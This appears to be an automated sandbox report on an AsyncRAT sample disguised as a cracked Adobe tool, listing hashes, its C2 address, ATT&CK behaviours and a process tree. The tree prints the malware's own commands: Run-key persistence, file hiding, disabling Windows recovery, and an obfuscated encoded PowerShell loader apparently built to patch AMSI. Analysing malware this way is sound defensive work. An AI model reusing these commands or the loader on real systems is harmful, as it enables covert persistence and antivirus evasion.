asyncrat | a5238e60cbe814a8021050ddeb4c9569eea12cf8379d689e0cd84bb83a9b8266

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2024 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adobe-GenP.exe
Size

53.5MB
MD5

aefaebe48f578958c832f359d62406c1
SHA1

da6313c09ddbc2bb7ec5e0acc8a0c9d49d5d0051
SHA256

a5238e60cbe814a8021050ddeb4c9569eea12cf8379d689e0cd84bb83a9b8266
SHA512

e1cc0b6b2a19c0c511ff22a777a1b8db8296bca2797be32e837cab7ee4763104968de84f0e89649bbc0ae79b0812e3970712a3ea50a7f1a5b98e254b49f4f5e5
SSDEEP

1572864:pudEgIEMQXW+iffRUBPRD1peCaz5JuId9JWMr4bJz:phEMQX7iffRSR53W/l9JW2O1

Score

10^/10

asyncrat default discovery execution persistence rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

2.56.245.243:7777

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/memory/2292-8420-0x0000027E1FC00000-0x0000027E1FC16000-memory.dmp	family_asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
33	2292	powershell.exe
35	2292	powershell.exe
73	2292	powershell.exe
77	2292	powershell.exe
81	2292	powershell.exe
82	2292	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2292	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	genp.exe

Executes dropped EXE 5 IoCs

pid	Process
4440	genp.exe
1744	genp.exe
2672	genp.exe
2344	pythonw.exe
3760	genp.exe

Loads dropped DLL 58 IoCs

pid	Process
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4440	genp.exe
1744	genp.exe
1744	genp.exe
1744	genp.exe
1744	genp.exe
2672	genp.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
2344	pythonw.exe
3760	genp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek Audio = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Updater.exe"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
55	raw.githubusercontent.com
57	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	api.ipify.org
25	api.ipify.org
26	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4052	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
3456	tasklist.exe
3224	tasklist.exe
3476	tasklist.exe
1220	tasklist.exe
5060	tasklist.exe
2960	tasklist.exe
3164	tasklist.exe
4940	tasklist.exe
1628	tasklist.exe
2680	tasklist.exe
1756	tasklist.exe
4140	tasklist.exe
824	tasklist.exe
4696	tasklist.exe
3468	tasklist.exe
4920	tasklist.exe
1144	tasklist.exe
1200	tasklist.exe
3980	tasklist.exe
4536	tasklist.exe
1476	tasklist.exe
3924	tasklist.exe
2516	tasklist.exe
4756	tasklist.exe
1804	tasklist.exe
4252	tasklist.exe
1628	tasklist.exe
972	tasklist.exe
3048	tasklist.exe
1580	tasklist.exe
2032	tasklist.exe
1268	tasklist.exe
3392	tasklist.exe
4964	tasklist.exe
5056	tasklist.exe
512	tasklist.exe
2240	tasklist.exe
3544	tasklist.exe
3352	tasklist.exe
3392	tasklist.exe
2148	tasklist.exe
4500	tasklist.exe
4816	tasklist.exe
3668	tasklist.exe
1516	tasklist.exe
2016	tasklist.exe
4140	tasklist.exe
4436	tasklist.exe
4568	tasklist.exe
2616	tasklist.exe
964	tasklist.exe
1268	tasklist.exe
4272	tasklist.exe
2356	tasklist.exe
4944	tasklist.exe
2460	tasklist.exe
3108	tasklist.exe
2680	tasklist.exe
3824	tasklist.exe
4680	tasklist.exe
5040	tasklist.exe
2052	tasklist.exe
4328	tasklist.exe
972	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2228	reg.exe
2180	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4332	Adobe-GenP.exe
4440	genp.exe
4440	genp.exe
4440	genp.exe
4440	genp.exe
2672	genp.exe
2672	genp.exe
2432	powershell.exe
2432	powershell.exe
816	powershell.exe
816	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2344	pythonw.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4332	Adobe-GenP.exe
Token: SeIncreaseQuotaPrivilege	2868	WMIC.exe
Token: SeSecurityPrivilege	2868	WMIC.exe
Token: SeTakeOwnershipPrivilege	2868	WMIC.exe
Token: SeLoadDriverPrivilege	2868	WMIC.exe
Token: SeSystemProfilePrivilege	2868	WMIC.exe
Token: SeSystemtimePrivilege	2868	WMIC.exe
Token: SeProfSingleProcessPrivilege	2868	WMIC.exe
Token: SeIncBasePriorityPrivilege	2868	WMIC.exe
Token: SeCreatePagefilePrivilege	2868	WMIC.exe
Token: SeBackupPrivilege	2868	WMIC.exe
Token: SeRestorePrivilege	2868	WMIC.exe
Token: SeShutdownPrivilege	2868	WMIC.exe
Token: SeDebugPrivilege	2868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2868	WMIC.exe
Token: SeRemoteShutdownPrivilege	2868	WMIC.exe
Token: SeUndockPrivilege	2868	WMIC.exe
Token: SeManageVolumePrivilege	2868	WMIC.exe
Token: 33	2868	WMIC.exe
Token: 34	2868	WMIC.exe
Token: 35	2868	WMIC.exe
Token: 36	2868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2868	WMIC.exe
Token: SeSecurityPrivilege	2868	WMIC.exe
Token: SeTakeOwnershipPrivilege	2868	WMIC.exe
Token: SeLoadDriverPrivilege	2868	WMIC.exe
Token: SeSystemProfilePrivilege	2868	WMIC.exe
Token: SeSystemtimePrivilege	2868	WMIC.exe
Token: SeProfSingleProcessPrivilege	2868	WMIC.exe
Token: SeIncBasePriorityPrivilege	2868	WMIC.exe
Token: SeCreatePagefilePrivilege	2868	WMIC.exe
Token: SeBackupPrivilege	2868	WMIC.exe
Token: SeRestorePrivilege	2868	WMIC.exe
Token: SeShutdownPrivilege	2868	WMIC.exe
Token: SeDebugPrivilege	2868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2868	WMIC.exe
Token: SeRemoteShutdownPrivilege	2868	WMIC.exe
Token: SeUndockPrivilege	2868	WMIC.exe
Token: SeManageVolumePrivilege	2868	WMIC.exe
Token: 33	2868	WMIC.exe
Token: 34	2868	WMIC.exe
Token: 35	2868	WMIC.exe
Token: 36	2868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5104	WMIC.exe
Token: SeSecurityPrivilege	5104	WMIC.exe
Token: SeTakeOwnershipPrivilege	5104	WMIC.exe
Token: SeLoadDriverPrivilege	5104	WMIC.exe
Token: SeSystemProfilePrivilege	5104	WMIC.exe
Token: SeSystemtimePrivilege	5104	WMIC.exe
Token: SeProfSingleProcessPrivilege	5104	WMIC.exe
Token: SeIncBasePriorityPrivilege	5104	WMIC.exe
Token: SeCreatePagefilePrivilege	5104	WMIC.exe
Token: SeBackupPrivilege	5104	WMIC.exe
Token: SeRestorePrivilege	5104	WMIC.exe
Token: SeShutdownPrivilege	5104	WMIC.exe
Token: SeDebugPrivilege	5104	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5104	WMIC.exe
Token: SeRemoteShutdownPrivilege	5104	WMIC.exe
Token: SeUndockPrivilege	5104	WMIC.exe
Token: SeManageVolumePrivilege	5104	WMIC.exe
Token: 33	5104	WMIC.exe
Token: 34	5104	WMIC.exe
Token: 35	5104	WMIC.exe
Token: 36	5104	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2344	pythonw.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 1744	4440	genp.exe	88
PID 4440 wrote to memory of 760	4440	genp.exe	90
PID 4440 wrote to memory of 760	4440	genp.exe	90
PID 4440 wrote to memory of 2672	4440	genp.exe	91
PID 4440 wrote to memory of 2672	4440	genp.exe	91
PID 4440 wrote to memory of 3084	4440	genp.exe	93
PID 4440 wrote to memory of 3084	4440	genp.exe	93
PID 3084 wrote to memory of 2344	3084	cmd.exe	95
PID 3084 wrote to memory of 2344	3084	cmd.exe	95
PID 2344 wrote to memory of 2972	2344	pythonw.exe	96
PID 2344 wrote to memory of 2972	2344	pythonw.exe	96
PID 2344 wrote to memory of 980	2344	pythonw.exe	98
PID 2344 wrote to memory of 980	2344	pythonw.exe	98
PID 980 wrote to memory of 2868	980	cmd.exe	100
PID 980 wrote to memory of 2868	980	cmd.exe	100
PID 2344 wrote to memory of 3332	2344	pythonw.exe	102
PID 2344 wrote to memory of 3332	2344	pythonw.exe	102
PID 3332 wrote to memory of 5104	3332	cmd.exe	104
PID 3332 wrote to memory of 5104	3332	cmd.exe	104
PID 2344 wrote to memory of 3728	2344	pythonw.exe	105
PID 2344 wrote to memory of 3728	2344	pythonw.exe	105
PID 3728 wrote to memory of 2012	3728	cmd.exe	107
PID 3728 wrote to memory of 2012	3728	cmd.exe	107
PID 2344 wrote to memory of 3464	2344	pythonw.exe	108
PID 2344 wrote to memory of 3464	2344	pythonw.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Adobe-GenP.exe
"C:\Users\Admin\AppData\Local\Temp\Adobe-GenP.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Users\Admin\AppData\Local\Programs\genp\genp.exe
"C:\Users\Admin\AppData\Local\Programs\genp\genp.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Users\Admin\AppData\Local\Programs\genp\genp.exe
  "C:\Users\Admin\AppData\Local\Programs\genp\genp.exe" --type=gpu-process --field-trial-handle=1232,555483924959263510,9340484854478194519,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Discord\Update.exe" --processStart Discord.exe"
  2⤵
  PID:760
- C:\Users\Admin\AppData\Local\Programs\genp\genp.exe
  "C:\Users\Admin\AppData\Local\Programs\genp\genp.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1232,555483924959263510,9340484854478194519,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2004 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "pythonw.exe Crypto\Util\astor.py"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3084
- - C:\Users\Admin\AppData\Local\Temp\pyth\pythonw.exe
    pythonw.exe Crypto\Util\astor.py
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:2972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:980
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3728
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4876
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:932
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3456
  - - C:\Windows\SYSTEM32\reagentc.exe
      reagentc.exe /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:3796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:908
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio""
      4⤵
      PID:4352
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio"
        5⤵
        Modifies registry key
        
        PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe" /f"
      4⤵
      PID:1360
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2180
  - - C:\Windows\SYSTEM32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe"
      4⤵
      Views/modifies file attributes
      PID:4596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\helper.bat
      4⤵
      PID:3956
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoP"r"of"i"le -Executi"o"nPolic"y" Bypass -Wi"n"dowStyle Hidden -e"n"cod"e"dCo"m"ma"n"d ZgB1AG"4"AYwB0AGkAb"w"BuACAASQBuAHYAbwBrA"G"UALQBTAGgAYQB"y"AHAATAB"v"AGEAZABlAHIAD"Q"AKAH"s"ADQA"K"AA0ACgBQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0ADQAKACAAIAAgACAAIAAgACAAIAAkAGwAbwBjAGEAdABpAG8AbgA"s"AA0ACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQANAAoACQAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQANAAoAIAAgACAAIAAgACAAIAAgACQAcABhAHMAcwB3AG8AcgBkACwADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0ADQAKACAAIAAgACAAIAAgACAAIAAkAGEAcgBnAHUAbQBlAG4AdAAsAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdAA0ACgAgACAAIAAgACAAIAAgACAAJABhAHIAZwB1AG0AZQBuAHQAMgAsAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdAA0ACgAgACAAIAAgACAAIAAgACAAJABhAHIAZwB1AG0AZQBuAHQAMwAsAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHcAaQB0AGMAaABdAA0ACgAgACAAIAAgACAAIAAgACAAJABuAG8AQQByAGcAcwANAAoACQApAA0ACgANAAoAJABzAGgAYQByAHAAbABvAGEAZABlAHIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEwAaQBuAHEAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwANAAoAdQBzAGkAbgBnACAAUwB5AH"M"AdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoADQAKAG4AYQBtAGUAcwBwAGEAYwBlACAAUwBoAGEAcgBwAEwAbwBhAGQAZQByAA0ACgB7AA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAZwBvAGYAbwByADQAbQBzAGkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHQAaQBjACAAYgB5AHQAZQBbAF0AIAB4ADYANAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwBd"A"CAAewAgADAAeABCADgALAAgADAAeAA1ADcALAAgADAAeAAwADAALAAgADAAeAAwADcALAAgADAAeAA4ADAALAAgADAAeABDADMAIAB9ADsADQAKACAAIAAgACAAIAAgACAAIABzAHQAYQB0AGkAYwAgAGIAeQB0AGUAWwBdACAAeAA4ADYAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAXQ"A"gAHsAIAAwAHgAQgA4ACwAIAAwAHgANQA3ACwAIAAwAHgAMAAwACwAIAAwAHgAMAA3ACwAIAAwAHgAOAAwACwAIAAwAHgAQwAyACwAIAAwAHgAMQA4ACwAIAAwAHgAMAAwACAAfQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAbgBvAHcAKAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKABpAHMANgA0AEIAaQB0ACgAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAbwBmAG8AcgAoAHgANgA0ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABnAG8AZgBvAHIAKAB4ADgANgApADsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABnAG8AZgBvAHIAKABiAHkAdA"B"lAFsAXQAgAHAAYQB0AGMAaAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA"d"gBhAHIAIABhACAAPQAgACIAYQBtACIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAHMAaQAgAD0AIAAiAHMAaQAiADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdgBhAHIAIABkAGwAbAAgAD0AIAAiAC4AZABsAGwAIgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHYAYQByACAAbABpAGIAIAA9ACAAVwBpAG4AMwAyAC4ATABvAGEAZABMAGkAYgByAGEAcgB5ACgAYQArAHMAaQArAGQAbABsACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAEEAbQAgAD0AIAAiAEEAbQAiADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdgBhAHIAIABzAGkAUwBjAGEAbgAgAD0AIAAiAHMAaQBTAGMAYQBuACIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAEIAdQBmAGYAZQByACAAPQAgACIAQgB1AGYAZgBlAHI